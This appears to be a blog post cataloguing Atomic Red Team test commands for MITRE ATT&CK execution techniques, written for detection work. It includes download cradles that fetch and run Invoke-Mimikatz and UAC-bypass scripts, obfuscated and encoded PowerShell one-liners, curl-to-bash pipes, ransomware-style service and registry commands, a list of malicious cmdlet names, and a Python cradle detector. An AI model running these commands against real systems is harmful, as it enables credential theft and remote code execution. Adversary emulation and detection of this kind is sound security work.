Atomic - Execution Tactics

Overview of the specific techniques

Execution
T1610      Deploy a container
T1609      Kubernetes Exec Into Container
T1569.002  System Services: Service Execution                        [System Services]
T1569.001  System Services: Launchctl                                [System Services]
T1559      Inter-Process Communication                               [Inter-Process Communication]
T1559.002  Inter-Process Communication: Dynamic Data Exchange        [Inter-Process Communication]
T1204.003  User Execution: Malicious Image                           [User Execution]
T1204.002  User Execution: Malicious File                            [User Execution]
T1106      Native API                                                [Native API (excluded)]
T1059.007  Command and Scripting Interpreter: JavaScript             [Command Interpreter]
T1059.006  Command and Scripting Interpreter: Python                 [Command Interpreter]
T1059.005  Command and Scripting Interpreter: Visual Basic           [Command Interpreter]
T1059.004  Command and Scripting Interpreter: Bash                   [Command Interpreter]
T1059.003  Command and Scripting Interpreter: Windows Command Shell  [Command Interpreter]
T1059.002  Command and Scripting Interpreter: AppleScript            [Command Interpreter]
T1059.001  Command and Scripting Interpreter: PowerShell             [Command Interpreter]
T1047      Windows Management Instrumentation                        [Windows Management Instrumentation (WMI)]

Host model - System Services

T1569.002  System Services: Service Execution
T1569.001  System Services: Launchctl

Host model - System Services - Service Execution
1. Execute a command in the form of a service start
sc.exe create artservice binPath= "%COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\art-marker.txt"

sc.exe start ARTService

sc.exe delete ARTService

2. Execute a command on a remote host with psexec
psexec.exe \\localhost -u DOMAIN\Administrator -p P@ssw0rd1 -accepteula "C:\Windows\System32\calc.exe"
3. Execute a command on a remote host with the Impacket psexec.py script
psexec.py 'domain/administrator:pxssw0rd1@127.0.0.1' 'whoami'
4. Execute commands before encryption, as the BlackCat ransomware does
cmd.exe /c "wmic csproduct get UUID"
cmd.exe /c "fsutil behavior set SymlinkEvaluation R2L:1"
cmd.exe /c "fsutil behavior set SymlinkEvaluation R2R:1"
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f
copy $pathtoatomicsfolder\T1569.002\bin\PsExec.exe $env:temp
cmd.exe /c "$env:temp\psexec.exe -accepteula \\#{targethost} cmd.exe /c echo "--access-token""
5. Execute a command on a remote host with the remcom tool
remcom.exe \\localhost /user:administrator /pwd:Pxxword1 cmd.exe
6. Create a service the way the Snake malware does
sc.exe create "WerFaultSvc" binPath= "$env:windir\WinSxS\x86_microsoft-windows-errorreportingfaults_31bf3856ad364e35_4.0.9600.16384_none_a13f7e283339a050\WerFault.exe" DisplayName= "WerFault Service" start= auto

Host model - System Services - Launchctl

This scenario is adapted for macOS. launchctl plays the same role as systemd on Linux and can be used to manage macOS services.

launchctl submit -l #{label_name} -- #{executable_path}

This chapter does not cover test adaptation for macOS.


Host model - Inter-Process Communication
1. Cobalt Strike Artifact Kit pipe
"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 1
2. Cobalt Strike Lateral Movement (psexec_psh) pipe
"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 2
3. Cobalt Strike SSH (postex_ssh) pipe
"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 3
4. Cobalt Strike post-exploitation pipe (4.2 and later)
"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 4
5. Cobalt Strike post-exploitation pipe (before 4.2)
"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 5

At present host-level inter-process communication cannot be inspected in depth; from the outside only basic keyword matching on command lines is possible, so it is enough to add the following to the advanced intelligence library of matched keywords.
namedpipes_executor.exe


Host model - Inter-Process Communication - Dynamic Data Exchange

Judging from the details of the operation, this likewise cannot be detected at present, and keyword matching does not work for it either.


Host model - User Execution - Malicious File

See the link below. I looked through the 11 ways of luring or tricking users into executing malicious files described there; they are all fairly complex, and detection would need to work across several dimensions. I did notice one very clear feature: various commands are run from the command line to download the malicious file and execute the malicious code at the same time. In other words, this situation generally involves a download; only the form of the command used to download the malicious file differs.

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md

Command-line download signatures recorded

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)

echo var url = "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
cscript //E:Jscript %TEMP%\OSTapGet.js

Invoke-WebRequest http://amtso.eicar.org/PotentiallyUnwanted.exe -OutFile $env:TEMP/PotentiallyUnwanted.exe

Invoke-WebRequest -OutFile $env:Temp\test10.lnk "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/bin/test10.lnk"

Host model - User Execution - Malicious Image

This is really the same as User Execution - Malicious File described above; the only difference is that the file being downloaded is an image file.

Command-line download signatures recorded

IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.003/src/qbot-test.iso" -OutFile "$env:TEMP\qbot-test.iso")

Host model - Native API

I found that of the steps executed here, the first is obtained by compiling with csc.exe, and the other 3 use WinPwn to download the corresponding PowerShell scripts and execute them.

Command-line download signatures recorded

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/CreateProcess/Get-CreateProcessSystem.ps1')
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/CreateProcess/Get-CreateProcessSystemBind.ps1')
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/NamedPipe/NamedPipeSystem.ps1')

Host model - Command and Scripting Interpreter - PowerShell
1. Download the PowerShell version of Mimikatz and run it to steal credentials
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
  • Download and execute Invoke-Mimikatz
2. Run the BloodHound internal-network penetration tool from local disk
  • Introduction
    BloodHound uses a graph of nodes and edges to present the relationships between domain users, computers, groups, sessions, ACLs and all related users, groups, computers, logon information and access-control policies in the domain, giving the Red Team a more intuitive view for analysing the domain and escalating their privileges within it faster. It also lets Blue Team members check the security of their own network and ensure the security of the domain.

BloodHound exports the relevant information from within the domain; after the data is collected it is imported into a Neo4j database for display and analysis. Neo4j is a NoSQL graph database that stores structured data in a network rather than in tables, and BloodHound takes advantage of this property to analyse the data sensibly and present it more intuitively as a "node space".

write-host "Import and Execution of SharpHound.ps1 from #{file_path}" -ForegroundColor Cyan
import-module #{file_path}\SharpHound.ps1
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
3. Use a download cradle to run BloodHound in memory
  • What is a download cradle?
    A download cradle is a one-liner whose main purpose is to download additional malicious code with further functionality from a remote location and execute it.

Reference: http://wp.blkstone.me/2019/03/what-is-download-cradles/

write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
4. Obfuscation tests
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs()
Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))

No signature can be extracted for detection.

5. Run Mimikatz via PsSendKeys
  • The main purpose is to run mimikatz through PsSendKeys. After execution it automatically runs File Explorer and Notepad and types in the code, and finally shows the mimikatz dump output.
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
6. Use the Invoke-AppPathBypass script to bypass UAC restrictions and execute a command

AppPathBypass: UAC bypass via App Paths implemented in PowerShell

References:
https://zhuanlan.zhihu.com/p/29325846
https://gist.github.com/netbiosX/54a305a05b979e13d5cdffeba5436bcc
https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/

Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
7. Load a download cradle with the PowerShell MsXml COM object
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
8. Load a download cradle with PowerShell XML requests
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.xml');$Xml.command.a.execute | IEX"
9. Invoke mshta.exe from PowerShell to load a download cradle
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct').Exec();close()"
10. Use Invoke-DownloadCradle directly from PowerShell
Open PowerShell as a privileged user, then run Invoke-DownloadCradle.ps1
11. PowerShell fileless script execution
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI="
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
12. Run an older PowerShell version for the attack
powershell.exe -version 2 -Command Write-Host $PSVersion
13. NTFS alternate data stream access
Add-Content -Path $env:TEMP\NTFS_ADS.txt -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
14. PowerShell session creation and use
New-PSSession -ComputerName $env:COMPUTERNAME
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
15. Use ATHPowerShellCommandLineParameter to vary the parameter form and run powershell
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -CommandParamVariation C -Execute -ErrorAction Stop
16. Use ATHPowerShellCommandLineParameter to vary and encode the parameters and run powershell
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -CommandParamVariation C -UseEncodedArguments -EncodedArgumentsParamVariation EA -Execute -ErrorAction Stop
17. Use ATHPowerShellCommandLineParameter with the EncodedCommand parameter to run powershell
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -EncodedCommandParamVariation E -Execute -ErrorAction Stop
18. Use ATHPowerShellCommandLineParameter with the EncodedCommand and UseEncodedArguments parameters to run powershell
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -EncodedCommandParamVariation E -UseEncodedArguments -EncodedArgumentsParamVariation EncodedArguments -Execute -ErrorAction Stop
19. Execute a command with obfuscated PowerShell
powershell.exe -e  JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==
20. Call known-malicious cmdlets from powershell
  • What are cmdlets?
    "Cmdlets" are the type of command used in PowerShell. A cmdlet, whose full name is "Cmdlet command", is a PowerShell command type used to carry out all kinds of tasks and operations. Each cmdlet represents one specific operation and has its own parameters, options and output.

Using cmdlets in PowerShell helps users complete tasks faster and more efficiently, for example managing files, directories and processes, accessing network resources, or configuring computer settings. Cmdlets are usually provided by PowerShell itself or by script files written by third-party developers, and can also be written by yourself.

In a sense, they can be understood as similar to Python library files that implement a certain class of functionality: import them and call them when needed. So here we treat this as a collection of many malicious PowerShell libraries.

$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
    "function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
    $cmdlets}

Record these malicious cmdlets in particular

"Add-Persistence", "Find-AVSignature", "Get-GPPAutologon", "Get-GPPPassword", "Get-HttpStatus", "Get-Keystrokes", "Get-SecurityPackages", "Get-TimedScreenshot", "Get-VaultCredential", "Get-VolumeShadowCopy", "Install-SSP", "Invoke-CredentialInjection", "Invoke-DllInjection", "Invoke-Mimikatz", "Invoke-NinjaCopy", "Invoke-Portscan", "Invoke-ReflectivePEInjection", "Invoke-ReverseDnsLookup", "Invoke-Shellcode", "Invoke-TokenManipulation", "Invoke-WmiCommand", "Mount-VolumeShadowCopy", "New-ElevatedPersistenceOption", "New-UserPersistenceOption", "New-VolumeShadowCopy", "Out-CompressedDll", "Out-EncodedCommand", "Out-EncryptedScript", "Out-Minidump", "PowerUp", "PowerView", "Remove-Comments", "Remove-VolumeShadowCopy", "Set-CriticalProcess", "Set-MasterBootRecord"
21. Call PowerUp from the PowerShellMafia scripts to check privilege-escalation paths
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
22. Abuse nslookup for DNS queries
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup  { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
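
The "command-line download signatures recorded" above (Malicious File, Malicious Image, Native API) and the PowerShell cradle and encoded-command items in this section all come down to keyword matching on process command lines. The following is an added example, not code from the original post or from Atomic Red Team: a Python matcher for those patterns that first decodes an -e/-EncodedCommand payload so the same rules run on the hidden script. The rule names, placeholder URLs and sample command lines are constructed for the example.

```python
import base64
import re
from typing import Optional

# Added example (not from the original post or Atomic Red Team): keyword rules
# for the download-cradle / pipe-to-shell command lines catalogued on this page.
CRADLE_RULES = [
    ("ps_downloadstring", re.compile(r"net\.webclient\)?\s*\.\s*downloadstring", re.I)),
    ("ps_downloadfile",   re.compile(r"net\.webclient\)?\s*\.\s*downloadfile", re.I)),
    ("ps_iwr_to_iex",     re.compile(r"\biex\s*\(\s*(iwr|invoke-webrequest)\b", re.I)),
    ("ps_msxml_cradle",   re.compile(r"msxml2\.serverxmlhttp", re.I)),
    ("ps_xml_load_iex",   re.compile(r"xmldocument.*\.load\(.*\|\s*iex\b", re.I)),
    ("mshta_getobject",   re.compile(r"mshta(\.exe)?\s+javascript:.*getobject\(", re.I)),
    ("sh_pipe_to_shell",  re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", re.I)),
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...).
ENC_FLAG = re.compile(r"(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE script behind -e/-EncodedCommand, or None if absent."""
    for m in ENC_FLAG.finditer(cmdline):
        if not "encodedcommand".startswith(m.group(1).lower()):
            continue  # e.g. -exec or -ep are different switches
        try:
            return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return None
    return None


def scan_cmdline(cmdline: str) -> dict:
    """Run every rule over the command line and over its decoded payload, if any."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = [name for name, rx in CRADLE_RULES if rx.search(haystack)]
    return {"hits": hits, "decoded": decoded}


def encode_ps(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects (UTF-16LE base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample command lines (placeholder URLs, not real telemetry).
SAMPLES = [
    "powershell.exe \"IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/a.ps1')\"",
    "powershell.exe -exec bypass -noprofile \"$c=New-Object -ComObject MsXml2.ServerXmlHttp;"
    "$c.Open('GET','https://example.invalid/t.ps1',$False);$c.Send();IEX $c.ResponseText\"",
    "cmd.exe /c \"mshta.exe javascript:a=GetObject('script:https://example.invalid/m.sct').Exec();close()\"",
    "powershell.exe -e " + encode_ps("IEX (iwr 'https://example.invalid/p.ps1' -UseBasicParsing)"),
    "bash -c \"curl -sS https://example.invalid/x.sh | bash\"",
    "powershell.exe -Command Get-Content C:\\Windows\\Temp\\notes.txt",  # benign
]


def scan_all(samples=SAMPLES):
    """Return the rule hits per sample, in order."""
    return [scan_cmdline(s)["hits"] for s in samples]


if __name__ == "__main__":
    for sample, hits in zip(SAMPLES, scan_all()):
        print(hits or "clean", "<-", sample[:60])
```

The obfuscated one-liners in items 4 and 5 of this section deliberately avoid these literal strings, which is why the page notes that no signature can be extracted for them; decoding the -e payload before matching at least closes the simplest evasion.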

Host model - Command and Scripting Interpreter - AppleScript

Reference: https://github.com/EmpireProject/Empire

osascript -e "do shell script \"echo \\\"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('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'));\\\" | python &\""

Host model - Command and Scripting Interpreter - Windows Command Shell
1. Create and execute a batch script
Start-Process $env:TEMP\T1059.003_script.bat
2. Write text to a file and display it
echo "Hello from the Windows Command Prompt! " > "%TEMP%\test.bin" & type "%TEMP%\test.bin"
3. Suspicious execution through the Windows command line
%LOCALAPPDATA:~-3,1%md /c echo Hello, from CMD! > hello.txt & type hello.txt
4. Simulate the BlackByte ransomware print bombing
cmd /c "for /l %x in (1,1,75) do start wordpad.exe /p $env:temp\T1059_003note.txt" | out-null
5. Read content from the command line and execute it
cmd /r cmd<PathToAtomicsFolder\T1059.003\src\t1059.003_cmd.cmd

Host model - Command and Scripting Interpreter - Bash
1. Create and execute a shell script
sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh"
sh -c "echo 'ping -c 4 8.8.8.8' >> /tmp/art.sh"
chmod +x /tmp/art.sh
sh /tmp/art.sh
2. Download a shell script from the command line and execute it through a pipe
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
3. Collect SUID executables
chmod +x PathToAtomicsFolder/T1059.004/src/AutoSUID.sh
bash PathToAtomicsFolder/T1059.004/src/AutoSUID.sh

Reference:
https://raw.githubusercontent.com/IvanGlinkin/AutoSUID/main/AutoSUID.sh
4. Run the LinEnum information-gathering tool
chmod +x PathToAtomicsFolder/T1059.004/src/LinEnum.sh
bash PathToAtomicsFolder/T1059.004/src/LinEnum.sh

Reference:
https://raw.githubusercontent.com/rebootuser/LinEnum/c47f9b226d3ce2848629f25fe142c1b2986bc427/LinEnum.sh

5. Put the script into a temporary file
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
6. Query which shell the script is executing in
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
7. Confirm which shell environments are available
cat /etc/shells
8. Fileless shell script execution
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
9. Obfuscate the command-line script
ART=$(echo -n "id" |base64 -w 0)
echo "\$ART=$ART"
echo -n "$ART" |base64 -d |/bin/bash
unset ART
10. Change the login shell
useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
11. Execute a shell script via an environment variable
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/bash
12. Detect a pipe-to-shell
cd /tmp
curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh
ls -la /tmp/art.txt
curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh |bash
ls -la /tmp/art.txt

Host model - Command and Scripting Interpreter - Visual Basic
1. Collect local computer information with a VB script
cscript PathToAtomicsFolder\T1059.005\src\sys_info.vbs > $env:TEMP\T1059.005.out.txt
2. Encode VBS code and execute it
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"
3. Extract information from memory via VBA
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract"

Host model - Command and Scripting Interpreter - Python
1. Execute a shell script using Python's command-line argument mode
which_python=$(which python || which python3 || which python2)
$which_python -c 'import requests;import os;url = "https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh";malicious_command = "sh T1059.006-payload -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles";session = requests.session();source = session.get(url).content;fd = open("#{payload_file_name}", "wb+");fd.write(source);fd.close();os.system(malicious_command)'
2. Execute Python in the form of a .py script
which_python=$(which python || which python3 || which python2)
echo 'import requests' > T1059.006.py
echo 'import os' >> T1059.006.py
echo 'url = "https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh"' >> T1059.006.py
echo 'malicious_command = "T1059.006-payload T1059.006.py -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles"' >> T1059.006.py
echo 'session = requests.session()' >> T1059.006.py
echo 'source = session.get(url).content' >> T1059.006.py
echo 'fd = open("T1059.006-payload", "wb+")' >> T1059.006.py
echo 'fd.write(source)' >> T1059.006.py
echo 'fd.close()' >> T1059.006.py
echo 'os.system(malicious_command)' >> T1059.006.py
$which_python T1059.006.py
3. Execute Python in the form of a compiled executable file
which_python=$(which python || which python3 || which python2)
echo 'import requests' > T1059.006.py
echo 'import os' >> T1059.006.py
echo 'url = "https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh"' >> T1059.006.py
echo 'malicious_command = "T1059.006-payload T1059.006.py -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles"' >> T1059.006.py
echo 'session = requests.session()' >> T1059.006.py
echo 'source = session.get(url).content' >> T1059.006.py
echo 'fd = open("T1059.006-payload", "wb+")' >> T1059.006.py
echo 'fd.write(source)' >> T1059.006.py
echo 'fd.close()' >> T1059.006.py
echo 'os.system(malicious_command)' >> T1059.006.py
$which_python -c 'import py_compile; py_compile.compile("T1059.006.py", "T1059.006.pyc")'
$which_python T1059.006.pyc
4. Spawn bash and sh environments with Python's pty module and its spawn function
which_python=$(which python || which python3 || which python2)
$which_python -c "import pty;pty.spawn('/bin/sh')"
exit
$which_python -c "import pty;pty.spawn('/bin/bash')"
exit

Host model - Command and Scripting Interpreter - JavaScript
1. Use cscript to run JScript that collects local computer information
cscript PathToAtomicsFolder\T1059.007\src\sys_info.js > $env:TEMP\T1059.007.out.txt
2. Use wscript to run JScript that collects local computer information
wscript PathToAtomicsFolder\T1059.007\src\sys_info.js

Host model - Windows Management Instrumentation (WMI)
1. Reconnaissance of users with WMI
wmic useraccount get /ALL /format:csv
2. Reconnaissance of processes with WMI
wmic process get caption,executablepath,commandline /format:csv
3. Reconnaissance of software with WMI
wmic qfe get description,installedOn /format:csv
4. Reconnaissance of a remote host with WMI, listing service information
wmic /node:"127.0.0.1" service where (caption like "%Spooler%")
5. Execute a local process with WMI
wmic process call create notepad.exe
6. Execute a remote process with WMI
wmic /user:DOMAIN\Administrator /password:P@ssw0rd1 /node:"127.0.0.1" process call create notepad.exe
7. Create a process with a WMI query and an encoded command
powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA
8. Create a process with an obfuscated Win32 process class
$Class = New-Object Management.ManagementClass(New-Object Management.ManagementPath("Win32_Process"))
$NewClass = $Class.Derive("Win32_Atomic")
$NewClass.Put()
Invoke-WmiMethod -Path Win32_Atomic -Name create -ArgumentList notepad.exe
9. Execute rundll32 with WMI
wmic /node:127.0.0.1 process call create "rundll32.exe $env:TEMP\calc.dll StartW"
10. Uninstall an application with WMIC
wmic /node:"127.0.0.1" product where "name like 'Tightvnc%%'" call uninstall
posted @ 2023-06-06 17:12 by 皇帽讲绿帽带法技巧